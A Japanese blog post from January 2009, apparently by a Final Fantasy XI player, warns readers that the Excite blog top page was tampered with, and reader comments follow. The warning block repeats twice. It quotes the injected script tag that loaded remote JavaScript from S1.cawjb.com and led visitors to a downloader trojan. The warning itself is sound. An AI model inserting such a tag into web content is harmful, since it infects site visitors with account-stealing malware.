【Edit】2009/01/04(日)
『新たな罠URLの貼り付けのご用心を!」
お手数ですが「必ずお読みください」
※この記事は随時最しいます。(2008/11/17更新有)
詳しい 罠URL&危険IP&危険ホスト 等一覧がありますのでご確認下さい。
(PG2の導入、 hosts によるさらなる回避法も記載しています)
忍者ブログ系でPG2を使っているとあるIPを弾く件について (2008/11/06 更新有)
トップページより【重要なお知らせ】&【罠系最新情報】を記載しています。
※クリーンインスト時は回線は切断しておくこと!
【クリーンインストのやり方が解らない方は⇒(こちら)参照】
【その他お知らせ】
●12月のマイクロソフト月例パッチ、“緊急”6件と“重要”2件 ⇒日本時間 12月10日 (詳しくはこちら参照)
※緊急修正パッチ⇒12/11 1件
※Internet Explorer(IE)の脆弱性に対応する緊急のセキュリティ更新プログラム(修正パッチ)⇒12/18
↓ブラウザー毎に更新お忘れなく!
●Adobe Flash Playerバージョン10.0.12.36 ⇒(こちら) 【2008.10.18】
※FlashPlayerは使っている人が多いと思うので更新推奨。
※ブラザー毎でバージョンアップ必要(私の場合 IE と Firefox )
●Firefox 3がリリースされました
「Firefox 3.0.5」公開 (の最新版はこちらから (2008/12/17)
※パスワード保存機能の不具合を修正した「Firefox」v3.0.3が公開
※「Firefox 2.0.0.19」シリーズは昨年内でアップが終わってる為早急に3以降に
バージョンアップしておいてください。
●NoScript 1.8.8.5 のバージョンアップ有(詳しくはこちら) (2008/12/31)
---------------------------------------------------------------------------------------------
※※緊急警告(1月4日 9:00時点未対応)※※
エキサイトブログトップページ ログイン画面などに
見ただけでダウンローダトロイに感染するサイトへ誘導するスクリプト
<script src=http://S1.cawjb.com/jp.js>が挿入(改ざん)されています
※TOPページのお知らせ部分に、cawjbを呼び出すscriptが仕込まれている
1/3~対策無しにエキサイトブログのトップ閲覧 ログインした場合など
アカウントハック bot化のトロイに感染している危険があります。
対象トロイはバージョンアップしているらしいのでご注意ください
報告では、投稿時検出されてるのはHTML:script-inf(avast)。
トップの他にも、投稿スクリプトの中になんぞ仕込まれてる場合もあり
ヤバいスクリプト入りのhtmlが多発しているみたいです。
------------------------------------------
福建中華の罠ヤプログ 一部
yaplog■jp/19634/
4gameraikingのステルスIFRAME入り
S1●cawjb●comで ググっただけでも
日本語のweb ページだけで検索しても 6750 件も該当しています。
証券会社やあらゆるHPが・・・。もはやFF関係なしに・・。
------------------------------------------
詳しくは
スラッシュドット⇒(こちら参照)
セキュリティ: エキサイトブログのトップページが改ざんされ、悪意のあるスクリプトが埋め込まれる
エキブロ(2009/01/04 20:40現在 対処されたみたいです。
トップページから問題のスクリプト削除確認
お手数ですが「必ずお読みください」
※この記事は随時最しいます。(2008/11/17更新有)
詳しい 罠URL&危険IP&危険ホスト 等一覧がありますのでご確認下さい。
(PG2の導入、 hosts によるさらなる回避法も記載しています)
忍者ブログ系でPG2を使っているとあるIPを弾く件について (2008/11/06 更新有)
トップページより【重要なお知らせ】&【罠系最新情報】を記載しています。
※クリーンインスト時は回線は切断しておくこと!
【クリーンインストのやり方が解らない方は⇒(こちら)参照】
【その他お知らせ】
●12月のマイクロソフト月例パッチ、“緊急”6件と“重要”2件 ⇒日本時間 12月10日 (詳しくはこちら参照)
※緊急修正パッチ⇒12/11 1件
※Internet Explorer(IE)の脆弱性に対応する緊急のセキュリティ更新プログラム(修正パッチ)⇒12/18
↓ブラウザー毎に更新お忘れなく!
●Adobe Flash Playerバージョン10.0.12.36 ⇒(こちら) 【2008.10.18】
※FlashPlayerは使っている人が多いと思うので更新推奨。
※ブラザー毎でバージョンアップ必要(私の場合 IE と Firefox )
●Firefox 3がリリースされました
「Firefox 3.0.5」公開 (の最新版はこちらから (2008/12/17)
※パスワード保存機能の不具合を修正した「Firefox」v3.0.3が公開
※「Firefox 2.0.0.19」シリーズは昨年内でアップが終わってる為早急に3以降に
バージョンアップしておいてください。
●NoScript 1.8.8.5 のバージョンアップ有(詳しくはこちら) (2008/12/31)
---------------------------------------------------------------------------------------------
※※緊急警告(1月4日 9:00時点未対応)※※
エキサイトブログトップページ ログイン画面などに
見ただけでダウンローダトロイに感染するサイトへ誘導するスクリプト
<script src=http://S1.cawjb.com/jp.js>が挿入(改ざん)されています
※TOPページのお知らせ部分に、cawjbを呼び出すscriptが仕込まれている
1/3~対策無しにエキサイトブログのトップ閲覧 ログインした場合など
アカウントハック bot化のトロイに感染している危険があります。
対象トロイはバージョンアップしているらしいのでご注意ください
報告では、投稿時検出されてるのはHTML:script-inf(avast)。
トップの他にも、投稿スクリプトの中になんぞ仕込まれてる場合もあり
ヤバいスクリプト入りのhtmlが多発しているみたいです。
------------------------------------------
福建中華の罠ヤプログ 一部
yaplog■jp/19634/
4gameraikingのステルスIFRAME入り
S1●cawjb●comで ググっただけでも
日本語のweb ページだけで検索しても 6750 件も該当しています。
証券会社やあらゆるHPが・・・。もはやFF関係なしに・・。
------------------------------------------
詳しくは
スラッシュドット⇒(こちら参照)
セキュリティ: エキサイトブログのトップページが改ざんされ、悪意のあるスクリプトが埋め込まれる
エキブロ(2009/01/04 20:40現在 対処されたみたいです。
トップページから問題のスクリプト削除確認
[2回]
PR
この記事へのコメント
A Happy New year!
昨年中は仲良くして頂き、有難うございました。
今年もよろしくお願いします('∇')
いつもタメになる記事、参考にさせて頂いております!
これからも応援してますので、頑張ってくださいね♪
昨年中は仲良くして頂き、有難うございました。
今年もよろしくお願いします('∇')
いつもタメになる記事、参考にさせて頂いております!
これからも応援してますので、頑張ってくださいね♪
2009/01/05(月) 01:02 | | メロ #56a169ee03[ 編集]
あけましておめでとうございます!
今年もよろしくお願い致します。
ついにエキサイトブログにも…;
油断はしてないつもりですが、
それでも自分の身近に起きると
ドキッとしてしまいますね。
今後も油断しないよう気をつけます。
いつも情報参考にしております!
これからも頑張って下さい~
今年もよろしくお願い致します。
ついにエキサイトブログにも…;
油断はしてないつもりですが、
それでも自分の身近に起きると
ドキッとしてしまいますね。
今後も油断しないよう気をつけます。
いつも情報参考にしております!
これからも頑張って下さい~
2009/01/06(火) 00:27 | | イワッチ #93787446dd[ 編集]
★★★ メロさん ★★★
明けましておめでとうございます♪
今年もよろしくお願いします♪
実はこの情報を先にくれたのが
「革師匠」だったりします。
この場を借りて皮師匠に感謝w
★★★ イワッチさん ★★★
明けましておめでとうございます♪
今年もよろしくお願いします。
つい昨日も花鳥のゼニ交換していたら「垢ハックにあった」という方が白門でシャウトしていました。
ついつい油断してしまいそうになるけど、ネット社会はこれからも酷くなることは予想されるので
お互いに気をつけようね!
明けましておめでとうございます♪
今年もよろしくお願いします♪
実はこの情報を先にくれたのが
「革師匠」だったりします。
この場を借りて皮師匠に感謝w
★★★ イワッチさん ★★★
明けましておめでとうございます♪
今年もよろしくお願いします。
つい昨日も花鳥のゼニ交換していたら「垢ハックにあった」という方が白門でシャウトしていました。
ついつい油断してしまいそうになるけど、ネット社会はこれからも酷くなることは予想されるので
お互いに気をつけようね!
2009/01/06(火) 14:50 | | 迷子 #99d043d293[ 編集]
Template by
Copyright © TOKOの独り言w
Copyright (C) SQUARE ENIX CO., LTD. All Rights Reserved.(スクリーンショット:SS画像)
当ホームページに記載されている会社名・製品名・システム名などは、各社の登録商標、もしくは商標です